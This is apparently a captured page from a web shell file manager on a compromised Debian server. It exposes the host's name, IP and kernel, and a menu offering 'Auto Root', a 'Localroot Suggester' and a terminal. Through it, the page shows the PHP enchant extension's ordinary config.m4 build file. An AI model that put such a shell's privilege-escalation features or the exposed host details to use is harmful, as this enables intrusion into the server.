Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.35
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
src /
php-7.4.33 /
ext /
enchant /
Delete
Unzip
Name
Size
Permission
Date
Action
.libs
[ DIR ]
drwxr-xr-x
2024-03-12 14:24
tests
[ DIR ]
drwxrwxr-x
2022-10-31 11:36
CREDITS
44
B
-rw-rw-r--
2022-10-31 11:36
config.m4
723
B
-rw-rw-r--
2022-10-31 11:36
config.w32
693
B
-rw-rw-r--
2022-10-31 11:36
enchant.c
23.96
KB
-rw-rw-r--
2022-10-31 11:36
enchant.lo
324
B
-rw-r--r--
2024-03-12 14:24
enchant.o
167.2
KB
-rw-r--r--
2024-03-12 14:24
php_enchant.h
2.37
KB
-rw-rw-r--
2022-10-31 11:36
Save
Rename
PHP_ARG_WITH([enchant], [whether to build with Enchant support], [AS_HELP_STRING([--with-enchant], [Include Enchant support])]) if test "$PHP_ENCHANT" != "no"; then PKG_CHECK_MODULES([ENCHANT], [enchant]) PHP_EVAL_INCLINE($ENCHANT_CFLAGS) PHP_EVAL_LIBLINE($ENCHANT_LIBS, ENCHANT_SHARED_LIBADD) AC_DEFINE(HAVE_ENCHANT, 1, [ ]) PHP_CHECK_LIBRARY(enchant, enchant_get_version, [ AC_DEFINE(HAVE_ENCHANT_GET_VERSION, 1, [ ]) ], [ ], [ $ENCHANT_LIBS ]) PHP_CHECK_LIBRARY(enchant, enchant_broker_set_param, [ AC_DEFINE(HAVE_ENCHANT_BROKER_SET_PARAM, 1, [ ]) ], [ ], [ $ENCHANT_LIBS ]) PHP_NEW_EXTENSION(enchant, enchant.c, $ext_shared) PHP_SUBST(ENCHANT_SHARED_LIBADD) fi